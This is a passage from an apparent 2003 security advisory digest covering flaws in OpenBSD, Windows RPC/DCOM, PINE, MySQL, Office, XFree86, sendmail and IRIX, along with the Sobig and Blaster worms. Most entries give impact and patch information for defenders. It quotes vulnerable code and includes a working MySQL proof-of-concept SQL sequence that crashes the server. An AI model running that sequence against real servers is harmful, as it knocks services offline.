requires the creation of NIS or NIS+ DES keys to have been created for

each Solaris user and each host.


In order to upgrade the authentication setting, the sadmind line in

/etc/inetd.conf should be changed to look like the following: 


100232/10 tli rpc/udp wait root /usr/sbin/sadmind sadmind -S 2 


Sun also recommends using the Solaris Security Toolkit (JASS) to harden

a Solaris system, http://wwws.sun.com/software/security/jass/ .

Local security bug in OpenBSD semaphore handling

2003-09-10

Risk level: medium

Type: integer overflow

Source of info: blexim

Impact

An integer overflow condition exists in the OpenBSD 3.3-release kernel
and all previous versions.  It is possible for root to write to semi-arbitrary kernel memory irrespective of securelevel. This potentially
bypasses securelevel as root may modify the running kernel, introducing kernel level backdoors etc.

Overview

The mechanism used to achieve this is an
integer overflow in the semget(2) syscall, described below:

sys_semget() allocates a buffer here:

src/sys/kern/sysv_sem.c:
sys_semget():
  semaptr_new->sem_base = malloc(nsems * sizeof(struct sem),
      M_SEM, M_WAITOK);


provided the following checks are passed:

src/sys/kern/sysv_sem.c:
sys_semget():
  if (nsems <= 0 || nsems > seminfo.semmsl) {
      DPRINTF(("nsems out of range (0<%d<=%d)\n", nsems,
        seminfo.semmsl));
      return (EINVAL);
  }
  if (nsems > seminfo.semmns - semtot) {
      DPRINTF(("not enough semaphores left (need %d, got %d)\n",
        nsems, seminfo.semmns - semtot));
      return (ENOSPC);
  }

If these checks are passed and the buffer is successfully allocated,

the nsems (number of semaphores) value associated with the semaphore

set is set here:

src/sys/kern/sysv_sem.c:
sys___semctl():
  semaptr_new->sem_nsems = nsems;

Please also note that an int is being assigned to a short here, which

is a potential source of another bug. Since root is able to raise the

values of seminfo.semmns and seminfo.semmsl to arbitrary values via sysctl,
 it is possible to mis-size the malloc'd buffer, allowing memory to be
read and written via the semctl(2) syscall.
 
 The fix has been committed to -STABLE branch.
  
  You don't need to upgrade to -current, moreover this is not a trivial
operation since the format of executables files changed on x86 since 3.3.
  
  Just keep your current 3.3 version, sync your CVS tree with the OPENBSD_3_3
tag, recompile your kernel and reboot.

Patches

For more info about processing -STABLE branch:
 http://www.openbsd.org/stable.html
 http://www.uk.openbsd.org/anoncvs.html
 http://www.openbsd.org/cvsup.html
And for patch:
http://www.openbsd.org/cgi-bin/cvsweb.cgi/src/sys/kern/sysv_sem.c

  

Buffer Overrun In RPCSS Service Could Allow Code Execution

2003-09-10

Risk level: critical

Type: Buffer overrun

Source of info: Microsoft Security Team

Impact

There are three identified vulnerabilities in the part of RPCSS Service that deals with RPC messages for DCOM activation- two that could allow arbitrary code execution and one that could 
result in a denial of service.

An attacker who successfully exploited these vulnerabilities could be able to run code with Local System privileges on an affected system, or could cause the RPCSS Service to fail. The 
attacker could then be able to take any action on the system, including installing programs, viewing, changing or deleting data, or creating new accounts with full privileges.

Overview

The fix provided by this patch supersedes the one included in 
Microsoft Security Bulletin MS03-026.

Remote Procedure Call (RPC) is a protocol used by the Windows 
operating system. RPC provides an inter-process communication 
mechanism that allows a program running on one computer to 
seamlessly access services on another computer. The protocol 
itself is derived from the Open Software Foundation (OSF) RPC 
protocol, but with the addition of some Microsoft specific 
extensions. 

There are three identified vulnerabilities in the part of RPCSS 
Service that deals with RPC messages for DCOM activation- two 
that could allow arbitrary code execution and one that could 
result in a denial of service. The flaws result from incorrect 
handling of malformed messages. These particular vulnerabilities 
affect the Distributed Component Object Model (DCOM) interface 
within the RPCSS Service. This interface handles DCOM object 
activation requests that are sent from one machine to another.

An attacker who successfully exploited these vulnerabilities 
could be able to run code with Local System privileges on an 
affected system, or could cause the RPCSS Service to fail. The 
attacker could then be able to take any action on the system, 
including installing programs, viewing, changing or deleting 
data, or creating new accounts with full privileges.

To exploit these vulnerabilities, an attacker could create a 
program to send a malformed RPC message to a vulnerable system 
targeting the RPCSS Service.

Microsoft has released a tool that can be used to scan a network 
for the presence of systems which have not had the MS03-039 patch 
installed. More details on this tool are available in Microsoft 
Knowledge Base article 827363. This tool supersedes the one 
provided in Microsoft Knowledge Base article 826369. If the tool 
provided in Microsoft Knowledge Base Article 826369 is used 
against a system which has installed the security patch provided 
with this bulletin, the superseded tool will incorrectly report 
that the system is missing the patch provided in MS03-026. 
Microsoft encourages customers to run the latest version of the 
tool available in Microsoft Knowledge Base article 827363 to 
determine if their systems are patched.

Firewall best practices and standard default firewall configurations can help protect networks from remote attacks originating outside of the enterprise perimeter. Best practices recommend blocking all ports that are not actually being used. 
For this reason, most systems attached to the Internet should have a minimal number of the affected ports exposed.

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-039.asp 
http://www.microsoft.com/security/security_bulletins/MS03-039.asp

Two Exploitable Overflows in PINE

2003-09-10

Risk level: medium

Type: Buffer overflow

Source of info: iDEFENSE Labs

Impact

PINE (The Program for Internet News & Email) is a popular e-mail client shipped with many Linux and Unix distributions. It was developed at the University of Washington; more information is available at http://www.washington.edu/pine/ .

PINE contains two exploitable vulnerabilities that can be triggered when a victim opens a specially crafted email sent by an attacker.

Overview

PINE contains two exploitable vulnerabilities that can be triggered
when a victim opens a specially crafted email sent by an attacker.

- --- Vulnerability 1: Buffer Overflow ---

A remotely exploitable buffer overflow exists within the parsing of the
message/external-body type attribute name/value pairs. Failure to check
that the length of the longest attribute is less than the space
available allows a maliciously formed e-mail message to overwrite
control structures. Careful modification of these values allows
arbitrary code execution. However, exploitation requires knowledge of
the targeted version of PINE.

A 20kb character array is declared as:

headers.h:
#define SIZEOF_20KBUF (20480)

pine.c:
char tmp_20k_buf[SIZEOF_20KBUF];

The tmp_20k_buf[] array is stored within the .bss section and
referenced with a character pointer 'd'.  The overflow occurs within
the following snippet of code from the display_parameters() routine in
mailview.c:

d = tmp_20k_buf;
if(parmlist = rfc2231_newparmlist(params)){
    while(rfc2231_list_params(parmlist) && d < tmp_20k_buf + 10000){
        sprintf(d, "%-*s: %s\n", longest, parmlist->attrib,
                parmlist->value ? strsquish(tmp_20k_buf + 11000,
                parmlist->value, 100)
                : "");
        d += strlen(d);
    }

Starting at 'd', the code adds spaces to the left of the string as
padding to make the total length of the parameter attribute string
equal to that of the 'longest'. Later displaying the Attribute
name/value pairs. Example:

Access-Type: ftp
        URL: ftp://localhost/pub/interesting.ps

Supplying any attribute name that is over 20kb in length will overflow
the buffer, eventually allowing for arbitrary code execution.


- --- Vulnerability 2: Integer Overflow ---

A remotely exploitable integer overflow exists in the parsing of e-mail
headers, allowing for arbitrary code execution upon the opening of a
malicious e-mail. The vulnerability exists within the
rfc2231_get_param() routine found in the strings.c file. A character
array of size 64 is declared:

#define RFC2231_MAX 64
...
char *pieces[RFC2231_MAX];

and indexed by the signed integer variable 'n':

if(n < RFC2231_MAX){
    pieces[n] = parms->value;

The variable 'n' is attacker-controlled and can be set to contain a
negative value that satisfies the if statement yet references an
out-of-bounds index within the pieces[] array. Arbitrary code execution
is possible by storing assembly code within the parms->value structure
and writing beyond the 64-byte character array, thereby overwriting the
stored instruction pointer on the stack.

If an attacker were to socially engineer a PINE user into opening a
malformed e-mail message, arbitrary code embedded within can then run
with privileges of the currently logged on user. It would be trivial
for this exploit to be fashioned into a worm, targeting e-mail
addresses found in any readable text files (inbox, etc.).

Patches

http://www.washington.edu/pine/getpine/ .

Buffer overflow in MySQL

2003-09-10

Risk level: high

Type: Buffer overflow

Source of info: Frank Denis

Impact

 Passwords of MySQL users are stored in the "User" table, part of the "mysql"
database, specifically in the "Password" field.

  In MySQL 4.0.x and 3.23.x, these passwords are hashed and stored as a 16
characters long hexadecimal value, specifically in the "Password" field.

  Unfortunately, a function involved in password checking misses correct bounds
checking. By filling a "Password" field a value wider than 16 characters, a
buffer overflow will occur.

Overview

Anyone with global administrative privileges on a MySQL server may execute
arbitrary code even on a host he isn't supposed to have a shell on, with the
privileges of the system account running the MySQL server.


 -----[ Details ]-----
	 
  The get_salt_from_password() function defined in sql/password.c takes an
arbitrary long hex password and returns an arbitrary long binary array with
the previous decoded values :

void get_salt_from_password(ulong *res,const char *password)
{
	res[0]=res[1]=0;
	if (password)
	{
		while (*password)
		{
			ulong val=0;
			uint i;
			for (i=0 ; i < 8 ; i++)
			val=(val << 4)+char_val(*password++);
			*res++=val;
		}
	}
	return;
}

  This function is called sql/sql_acl.cc to check for access control.
  
  It is passed the raw content of the Password field from the User table of
the mysql database.

  The process aborts if then length is not a multiple of 8 but this is the
only check before get_salt_from_password() is actually called.

  The overflow occurs on a local ACL_USER instance in acl_init() and
successful exploitation of that bug is trivial on some platforms. On most
Linux systems the return address needs about 444 bytes to get overwritten.

  Harmless proof of concept :
  
  > USE mysql;
  > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
  > UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 123456781234567812345678123456781234567812345678123456781234567812345678
 12345678123456781234567812345678...' WHERE User = 'abcd';
  > FLUSH PRIVILEGES;
  
  [Connection lost]
  
  mysqld_safe/safe_mysqld log :
  
030806 21:05:43  mysqld restarted
030806 21:05:43  mysqld restarted
030806 21:05:43  mysqld restarted
030806 21:05:43  mysqld restarted

  MySQL log : tons of

mysqld got signal 11;
This could be because you hit a bug. It is also possible that this binary
or one of the libraries it was linked against is corrupt, improperly built,
or misconfigured. This error can also be caused by malfunctioning hardware.
We will try our best to scrape up some info that will hopefully help diagnose
the problem, but since we have already crashed, something is definitely wrong

  Confirmed on OpenBSD 3.3-RELEASE, FreeBSD 4.8-STABLE and Gentoo Linux 1.4.


 -----[ Affected versions ]-----
	 
  All versions of MySQL up to and including 4.0.14 are likely to be
vulnerable.

  All versions of MySQL up to and including 3.0.57 are also likely to be
affected.

  None workaround available but to mitigate the impact of this kind of vulnerability never let the
server run with "root" privileges. Create a dedicated user and add the --user=<dedicated user> command-line switch to start the daemon. Or edit
your "my.cnf" file to achieve similar results. There is no loss of functionnality when the server runs without root privileges.

Patches

http://www.mysql.com/downloads/mysql-4.0.html

Flaw in NetBIOS Could Lead to Information Disclosure

2003-09-05

Risk level: Low

Type: Information leakage

Source of info: Microsoft Security Team

Impact

Under certain conditions, the response to a NetBT Name Service 
query may, in addition to the typical reply, contain random data 
from the target system's memory. This data could, for example, be a 
segment of HTML if the user on the target system was using an 
Internet browser, or it could contain other types of data that 
exist in memory at the time that the target system responds to the 
NetBT Name Service query. 

Overview

Network basic input/output system (NetBIOS) is an application 
programming interface (API) that can be used by programs on a local 
area network (LAN). NetBIOS provides programs with a uniform set of 
commands for requesting the lower-level services required to manage 
names, conduct sessions, and send datagrams between nodes on a 
network. 

This vulnerability involves one of the NetBT (NetBIOS over TCP) 
services, namely, the NetBIOS Name Service (NBNS). NBNS is 
analogous to DNS in the TCP/IP world and it provides a way to find 
a system's IP address given its NetBIOS name, or vice versa. 

An attacker could seek to exploit this vulnerability by sending a 
NetBT Name Service query to the target system and then examine the 
response to see if it included any random data from that system's 
memory. 

If best security practices have been followed and port 137 UDP has 
been blocked at the firewall, Internet based attacks would not be 
possible.

Any information disclosure would be completely random.

By default, the Internet Connection Firewall (ICF), which is available with Windows XP and Windows Server 2003, blocks the ports that are used by NetBT.

To exploit this vulnerability, an attacker would have to be able to send a specially-crafted NetBT request to port 137 on the target system and then examine the response to see whether any
random data from that system's memory is included. In intranet environments, these ports are usually accessible, but systems that are connected to the Internet usually have these ports blocked 
by a firewall.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-034.asp
http://www.microsoft.com/security/security_bulletins/ms03-034.asp

Flaw in Microsoft Word Could Enable Macros to Run Automatically

2003-09-05

Risk level: Important

Type: flaw

Source of info: Microsoft Security Team

Impact

A vulnerability exists because it is possible for an attacker to 
craft a malicious document that will bypass the macro security 
model. If the document was opened, this flaw could allow a 
malicious macro embedded in the document to be executed 
automatically, regardless of the level at which macro security is 
set. The malicious macro could take the same actions that the user 
had permissions to carry out, such as adding, changing or deleting 
data or files, communicating with a web site or formatting the hard 
drive. 

Overview

A macro is a series of commands and instructions that can be 
grouped together as a single command to accomplish a task 
automatically. Microsoft Word supports the use of macros to allow 
the automation of commonly performed tasks. Since macros are 
executable code it is possible to misuse them, so Microsoft Word 
has a security model designed to validate whether a macro should be 
allowed to execute depending on the level of macro security the 
user has chosen.

The vulnerability could only be exploited by an attacker who 
persuaded a user to open a malicious document - there is no way for 
an attacker to force a malicious document to be opened.


The user must open the malicious document for an attacker to be successful. An attacker cannot force the document to be opened automatically. 

The vulnerability cannot be exploited automatically through e-mail. A user must open an attachment sent in e-mail for an e-mail borne attack to be successful. 

By default, Outlook 2002 block programmatic access to the Address Book. In addition, Outlook 98 and 2000 block programmatic access to the Outlook Address Book if the Outlook Email Security Update has been installed. Customers who use any of these products would not be at risk of propagating an e-mail borne attack that attempted to exploit this vulnerability. 

The vulnerability only affects Microsoft Word - other members of the Office product family are not affected. 

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-035.asp 
http://www.microsoft.com/security/security_bulletins/MS03-035.asp

Buffer Overrun in WordPerfect Converter Could Allow Code Execution

2003-09-05

Risk level: Important

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

There is a flaw in the way that the Microsoft WordPerfect 
converter handles Corel(r) WordPerfect documents. A security 
vulnerability results because the converter does not correctly 
validate certain parameters when it opens a WordPerfect document, 
which results in an unchecked buffer. As a result, an attacker 
could craft a malicious WordPerfect document that could allow 
code of their choice to be executed if an application that used 
the WordPerfect converter opened the document. Microsoft Word and 
Microsoft PowerPoint (which are part of the Office suite), 
FrontPage (which is available as part of the Office suite or 
separately), Publisher, and Microsoft Works Suite can all use the 
Microsoft Office WordPerfect converter. 

Overview

Microsoft Office provides a number of converters that allow users 
to import and edit files that use formats that are not native to 
Office. These converters are available as part of the default 
installation of Office and are also available separately in the 
Microsoft Office Converter Pack. These converters can be useful 
to organizations that use Office in a mixed environment with 
earlier versions of Office and other applications, including 
Office for the Macintosh and third-party productivity 
applications.  

The vulnerability could only be exploited by an attacker who persuaded a user to open a malicious WordPerfect document-there is no way for an attacker to force a malicious document to be 
opened or to trigger an attack automatically by sending an e-mail message. 

The user must open the malicious document for an attacker to be successful. An attacker cannot force the document to be opened 
automatically. 

The vulnerability cannot be exploited automatically through e-mail. A user must open an attachment that is sent in an e-mail 
message for an e-mail-borne attack to be successful.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-036.asp
http://www.microsoft.com/security/security_bulletins/ms03-036.asp

Flaw in Visual Basic for Applications Could Allow Arbitrary Code Execution

2003-09-05

Risk level: Critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

A flaw exists in the way VBA checks document properties passed to 
it when a document is opened by the host application. A buffer 
overrun exists which if exploited successfully could allow an 
attacker to execute code of their choice in the context of the 
logged on user. 

Overview

Microsoft VBA is a development technology for developing client desktop packaged applications and integrating them with existing data and systems. Microsoft VBA is based on the Microsoft Visual Basic development system. Microsoft Office products include VBA and make use of VBA to perform certain functions. VBA can also be 
used to build customized applications based around an existing host application. 


In order for an attack to be successful, a user would have to open a specially crafted document sent to them by an attacker. 
This document could be any type of document that supports VBA, such as a Word document, Excel spreadsheet, PowerPoint presentation. In the case where Microsoft Word is being used as the HTML e-mail editor for Microsoft Outlook, this document could be an e-mail, however the user would need to reply to, or forward the mail message in order for the vulnerability to be exploited. 

The user must open a document sent to them by an attacker in 
order for this vulnerability to be exploited. 

When Microsoft Word is being used as the HTML e-mail editor in Outlook, a user would need to reply to or forward a malicious e-mail document sent to them in order for this vulnerability to be 
exploited. 

An attacker's code could only run with the same rights as the logged on user. The specific privileges the attacker could gain through this vulnerability would therefore depend on theprivileges granted to the user. 
Any limitations on a user's account, such as those applied through Group Policies, would also limit the actions of any arbitrary code executed by this vulnerability.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-037.asp
http://www.microsoft.com/security/security_bulletins/ms03-037.asp

Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution

2003-09-05

Risk level: Moderate

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

A vulnerability exists because of a flaw in the way that Snapshot 
Viewer validates parameters. Because the parameters are not correctly
checked, a buffer overrun can occur, which could allow an attacker to
execute the code of their choice in the security context of the 
logged-on user.

Overview

With Microsoft Access Snapshot Viewer, you can distribute a snapshot 
of a Microsoft Access database that allows the snapshot to be viewed 
without having Access installed. For example, a customer may want to 
send a supplier an invoice that is generated by using an Access 
database. With Microsoft Access Snapshot Viewer, the customer can 
package the database so that the supplier can view it and print it 
without having Access installed.

The Microsoft Access Snapshot Viewer is available with all versions 
of Access - though it is not installed by default - and is also 
available as a separate stand-alone. The Snapshot Viewer is 
implemented by using an ActiveX control.

For an attack to be successful, an attacker would have to persuade a 
user to visit a malicious Web site that is under the attacker's 
control.

The Microsoft Access Snapshot Viewer is not installed with 
Microsoft Office by default.

An attacker would need to persuade a user to visit a website under the attacker's control for an attack to be successful.

An attacker's code would run with the same permissions as the user. If a user's permissions were restricted the attacker would 
be similarly restricted.

Patches

http://www.microsoft.com/technet/security/bulletin/MS03-038.asp  http://www.microsoft.com/security/security_bulletins/MS03-038.asp

Remote and local vulnerabilities in XFree86 font libraries

2003-09-01

Risk level: high

Type: Buffer overflow

Source of info: blexim

Impact

Several bugs in the font libraries of the current version
(4.3.0) of the XFree86 font libraries could potentially
lead to the execution of arbitrary code by a remote user in any process
which calls the functions in question. The functions are related to
the transfer and enumeration of fonts from font servers to clients.

Overview

Specifically, several variables passed from a font server to a client are not adequately checked, allowing integer overflows to cause
erroneoussizes of buffers to be calculated.  
These erroneous calculations can lead to
buffers on the heap and stack overflowing, potentially leading to arbitrary code
execution. 

The risk is limited by the fact that only clients can be affected remotely by these bugs, but in some (non default)
configurations, both xfs and XServer can act as clients to remote font servers.
In these configurations, both xfs and XServer could be potentially compromised
remotely.  

Also, it is possible for a local unprivileged user to alter
the configuration of Xserver in such a manner as to force it to loada font from an arbitrary font server.  Since Xserver is setuid root by
default, a local user may potentially gain root privileges.

Patches

The current CVS version of XFree86 has been updated to correct these issues.

Sendmail DNS Map Vulnerability

2003-08-27

Risk level: high

Type: Remote DoS

Source of info: SGI Security Team

Impact

It's been reported by sendmail.org that there is a potential problem in the sendmail 8.12 series with 
respect to DNS maps in sendmail 8.12.8 and earlier
sendmail 8.12.x versions.

Overview

SGI ships sendmail 8.12.5 with IRIX 6.5.19 and later. The bug did not exist
in versions before 8.12 as the DNS map type is new to 8.12.x versions.
This bug could potentially be exploited to cause a Denial of Service.
There may be a possibility of using it to gain remote root access.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2003-0688 to this issue:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0688

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected in patches and in future releases of IRIX.

The sendmail binary is installed by default on IRIX 6.5 systems as part of
eoe.sw.base.

SGI has provided a series of patches for these vulnerabilities and
recommend to upgrade to IRIX 6.5.22 (when available), or install the
appropriate patch.

Patches

ftp://patches.sgi.com/support/free/security/

Worm W32.Sobifg.F@mm under attack

2003-08-22

Risk level: high

Type: Worm

Source of info: Symantec

Impact

 W32.Sobig.F@mm is a mass-mailing, network-aware worm that uses its own SMTP engine to propagate and attempts to create a copy of itself on accessible network shares.    

Overview

Due to the number of submissions received from customers, Symantec Security Response has upgraded this threat to a Category 4 from a Category 3 threat as of August 21, 2003.

W32.Sobig.F@mm is a mass-mailing, network-aware worm that sends itself to all the email addresses it finds in the files that have the following extensions:

    * .dbx
    * .eml
    * .hlp
    * .htm
    * .html
    * .mht
    * .wab
    * .txt


The worm uses its own SMTP engine to propagate and attempts to create a copy of itself on accessible network shares, but fails due to bugs in the code.


Email routine details
The email message has the following characteristics:

From: Spoofed address (which means that the sender in the "From" field is most likely not the real sender). The worm may also use the address admin@internet.com as the sender.

      NOTES:
          o The spoofed addresses and the Send To addresses are both taken from the files found on the computer. Also, the worm may use the settings of the infected computer's settings to check for an SMTP server to contact.
    o The choice of the internet.com domain appears to be arbitrary and does not have any connection to the actual domain or its parent company.


Subject:

    * Re: Details
    * Re: Approved
    * Re: Re: My details
    * Re: Thank you!
    * Re: That movie
    * Re: Wicked screensaver
    * Re: Your application
    * Thank you!
* Your details


Body:

    * See the attached file for details
* Please see the attached file for details.


Attachment:

    * your_document.pif
    * document_all.pif
    * thank_you.pif
    * your_details.pif
    * details.pif
    * document_9446.pif
    * application.pif
    * wicked_scr.scr
* movie0045.pif



NOTES:

    * The worm de-activates on September 10, 2003. The last day on which the worm will spread is September 9, 2003.
* W32.Sobig.F@mm uses a technique known as "email spoofing," by which the worm randomly selects an address it finds on an infected computer.

For details see:
http://securityresponse.symantec.com/avcenter/venc/data/w32.sobig.f@mm.html
http://www.mks.com.pl/baza.html?show=description&id=2425

Unchecked Buffer in MDAC Function Could Enable System Compromise (Windows)

2003-08-20

Risk level: Important

Type: unchecked buffer

Source of info: Microsoft Security Team

Impact

It is possible to run code of the attacker's choice using unchecked buffer in Microsoft Data Access Components (MDAC). MDAC is a collection of 
components that are used to provide database connectivity on 
Windows platforms. MDAC is a ubiquitous technology, and it is 
likely to be present on most Windows systems.

Overview

Microsoft Data Access Components (MDAC) is a collection of 
components that are used to provide database connectivity on 
Windows platforms. MDAC is a ubiquitous technology, and it is 
likely to be present on most Windows systems:
 
 - By default, MDAC is included by default as part of Microsoft
   Windows XP, Windows 2000, Windows Millennium Edition, and
   Windows Server 2003. (It is worth noting, though, that the
   version that is installed by Windows Server 2003 does not have
   this vulnerability.) 
 - MDAC is available for download as a stand-alone technology. 
 - MDAC is either included in or installed by a number of other
   products and technologies. For example, MDAC is included in
   the Microsoft Windows NT(r) 4.0 Option Pack and in Microsoft SQL
   Server 2000. Additionally, some MDAC components are present as
   part of Microsoft Internet Explorer even when MDAC itself is
   not installed.
 
MDAC provides the underlying functionality for a number of 
database operations, such as connecting to remote databases and 
returning data to a client. When a client system on a network 
tries to see list of computers that are running SQL Server and 
that reside on the network, it sends a broadcast request to all 
the devices that are on the network. Due to a flaw in a specific 
MDAC component, an attacker could respond with a specially 
crafted packet that could cause a buffer overflow.
 
An attacker who successfully exploited this flaw could gain the 
same level of privileges over the system as the application that 
initiated the broadcast request. The actions an attacker could 
carry out would be dependent on the permissions which the 
application using MDAC ran under. If the application ran with 
limited privileges, an attacker would be limited accordingly; 
however, if the application runs under the local system context, 
the attacker would have the same level of permissions. This could 
include creating, modifying, or deleting data on the system, or 
reconfiguring the system. This could also include reformatting 
the hard disk or running programs of the attacker's choice. 

This bulletin supercedes the patch discussed in MS02-040. 
Customers should install this patch as it contains the fix for 
the vulnerability discussed in bulletin MS02-040 and the patch 
discussed in this bulletin. 

Mitigating Factors:
====================
 - For an attack to be successful an attacker would need to
   simulate a SQL server on the same subnet as the target system. 
 - Code executed on the client system would only run under the
   privileges of the logged-on user. 
 - MDAC version 2.8 (which is the version included with Windows
   Server 2003) does not contain the flaw that is addressed by
   this bulletin. 

Patches

http://www.microsoft.com/security/security_bulletins/ms03-033.asp

Cumulative Patch for Internet Explorer

2003-08-20

Risk level: Critical

Type: many types

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all 
previously released patches for Internet Explorer 5.01, 5.5 and 
6.0. In addition, it eliminates newly discovered vulnerabilities. 

Overview

The patch eliminates the following newly discovered vulnerabilities: 


 - A vulnerability involving the cross-domain security model of Internet Explorer, which keeps 
windows of different domains from sharing 
information. This flaw could result in the execution of script in the My Computer zone. 
To exploit this flaw, an attacker 
would have to host a malicious Web site that contained a Web page designed to exploit this 
particular vulnerability and then persuade a user
 to visit that site. After the user has visited 
the malicious Web site, it would be possible for the attacker to run malicious script by misusing
the method Internet Explorer uses to retrieve
 files from the browser cache, and cause that 
script to access information in a different domain. In the worst case, this could enable the
 Web site operator to load malicious 
script code onto a user's system in the security context of the My Computer zone. In addition, 
this flaw could also enable an attacker to run 
an executable file that was already present on 
the local system or view files on the computer. The flaw exists because a file from the Internet
 or intranet with a maliciously constructed URL
 can appear in the browser cache running in the My 
Computer zone. 

 - A vulnerability that occurs because Internet Explorer does not 
properly determine an object type returned from a Web server. It 
could be possible for an attacker who exploited this 
vulnerability to run arbitrary code on a user's system. If a user 
visited an attacker's Web site, it would be possible for the 
attacker to exploit this vulnerability without any other user 
action. An attacker could also craft an HTML-based e-mail that 
would attempt to exploit this vulnerability. 

This patch also sets the Kill Bit on the BR549.DLL ActiveX 
control. This control implemented support for the Windows 
Reporting Tool, which is no longer supported by Internet 
Explorer. The control has been found to contain a security 
vulnerability. To protect customers who have this control 
installed, the patch prevents the control from running or from 
being reintroduced onto users' systems by setting the Kill Bit 
for this control. This issue is discussed further in Microsoft 
Knowledge Base article 822925. 

In addition to these vulnerabilities, a change has been made to 
the way Internet Explorer renders HTML files. This change 
addresses a flaw in the way Internet Explorer renders Web pages 
that could cause the browser or Outlook Express to fail. Internet 
Explorer does not properly render an input type tag. A user 
visiting an attacker's Web site could allow the attacker to 
exploit the vulnerability by viewing the site. In addition, an 
attacker could craft a specially formed HTML-based e-mail that 
could cause Outlook Express to fail when the e-mail was opened or 
previewed.

This patch also contains a modification to the fix for the Object 
Type vulnerability (CAN-2003-0344) corrected in Microsoft 
Security Bulletin MS03-020. The modification corrects the 
behavior of the fix to prevent the attack on specific languages.

To exploit these flaws, the attacker would have to create a 
specially formed HTML-based e-mail and send it to the user. 
Alternatively an attacker would have to host a malicious Web site 
that contained a Web page designed to exploit these 
vulnerabilities. The attacker would then have to persuade a user 
to visit that site. 

As with the previous Internet Explorer cumulative patches 
released with bulletins MS03-004, MS03-015, and MS03-020 this 
cumulative patch will cause window.showHelp( ) to cease to 
function if you have not applied the HTML Help update. If you 
have installed the updated HTML Help control from Knowledge Base 
article 811630, you will still be able to use HTML Help 
functionality after applying this patch. 

For more details see:
http://www.microsoft.com/technet/security/bulletin/ms03-032

Patches

 http://www.microsoft.com/technet/security/bulletin/ms03-032.asp

Checkpoint/Restart Vulnerability on Irix

2003-08-15

Risk level: high

Type: file permissions compromise

Source of info: SGI Security Team

Impact

It has been reported that the checkpoint/restart (cpr) system has a security
vulnerability whereby normal users can truncate or overwrite certain files
for which they do not have appropriate permissions.

Overview

The 32 bit versions of libcpr are installed by default on IRIX 6.5 systems
as part of the optional eoe.sw.cpr package.  The 64 bit version is part of
the optional eoe.sw64.lib package which is installed by default on 64 bit
systems.

A local account on the system would be required to exploit this vulnerability.

The vulnerability exists within the 32 bit and 64 bit versions of the libcpr
library and therefore binaries that load that library may exhibit the
vulnerability.

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected with patches and in future releases of IRIX.

For more info see:
ftp://patches.sgi.com/support/free/security/advisories/20030802-01-P

Patches

http://support.sgi.com
ftp://patches.sgi.com/support/free/security/patches/

Denial of Service Vulnerability in NFS on Irix

2003-08-13

Risk level: high

Type: Remote DoS

Source of info: SGI Security Team

Impact

It's been reported that it is possible to create a Denial of Service attack
on the IRIX nfsd through the use of carefully crafted packets which cause
XDR decoding errors. This can lead to kernel panicing the system.  No local account or access to an NFS mount point is required, so this could be constructed as a remote exploit.

Overview

SGI has investigated the issue and recommends the following steps for
neutralizing the exposure.  It is HIGHLY RECOMMENDED that these measures be
implemented on ALL vulnerable SGI systems.

These issues have been corrected with patches and in future releases of IRIX.


SGI has provided a series of patches for these vulnerabilities. Our
recommendation is to upgrade to IRIX 6.5.20, or install the appropriate
patch (5229, 5230, 5240, 5241, 5227, 5228)

Patches

http://www.sgi.com/support/security/ 
ftp://patches.sgi.com/support/free/security/patches/

New Worm: W32.Blaster.worm exploits DCOM RPC vulnerability

2003-08-13

Risk level: high

Type: Worm

Source of info: Symantec

Impact

A worm has been
discovered in the wild that exploits the Microsoft Windows DCOM RPC
Interface Buffer Overrun Vulnerability (Bugtraq ID 8205) to infect
host systems.  Symantec has been tracking its activity and is
currently conducting analysis/full disassembly of the malicious code,
which has been named "Blaster".  

The results of the analysis are
being made available to the public at the following location:

<a href="https://tms.symantec.com/members/AnalystReports/030811-Alert-DCOMworm.pdf
">https://tms.symantec.com/members/AnalystReports/030811-Alert-DCOMworm.pdf</a>

Overview

The results of the analysis are
being made available to the public at the following location:
https://tms.symantec.com/members/AnalystReports/030811-Alert-DCOMworm.pdf

It is expected that this report will be updated frequently as more information is discovered.
  Readers are advised to download/refresh
it throughout the day to ensure that any new 
information is not missed.

Kernel memory disclosure in FreeBSD

2003-08-11

Risk level: high

Type: Information leakage

Source of info: FreeBSD Project Team

Impact

If iBCS2 support were enabled, a malicious user could call the iBCS2
version of statfs(2) with an arbitrarily large length parameter,
causing the kernel to return a large portion of kernel memory.  Such
memory might contain sensitive information, such as portions of the
file cache or terminal buffers.  This information might be directly
useful, or it might be leveraged to obtain elevated privileges in some
way.  For example, a terminal buffer might include a user-entered
password.

Overview

FreeBSD contains a kernel option (IBCS2) and kernel loadable module
(ibcs2.ko) that provide system call translation for running Intel
Binary Compatibility Specification 2 (iBCS2) compliant programs.
It is not enabled in FreeBSD by default.

II.  Problem Description

The iBCS2 system call translator for statfs(2) erroneously used the
user-supplied length parameter when copying a kernel data structure
into userland.  If the length parameter were larger than required,
then instead of copying only the statfs-related data structure,
additional kernel memory would also be made available to the user.

III. Impact

If iBCS2 support were enabled, a malicious user could call the iBCS2
version of statfs(2) with an arbitrarily large length parameter,
causing the kernel to return a large portion of kernel memory.  Such
memory might contain sensitive information, such as portions of the
file cache or terminal buffers.  This information might be directly
useful, or it might be leveraged to obtain elevated privileges in some
way.  For example, a terminal buffer might include a user-entered
password.

iBCS2 support is only present if the system administrator has enabled
it by including `option IBCS2' in the kernel configuration file, or
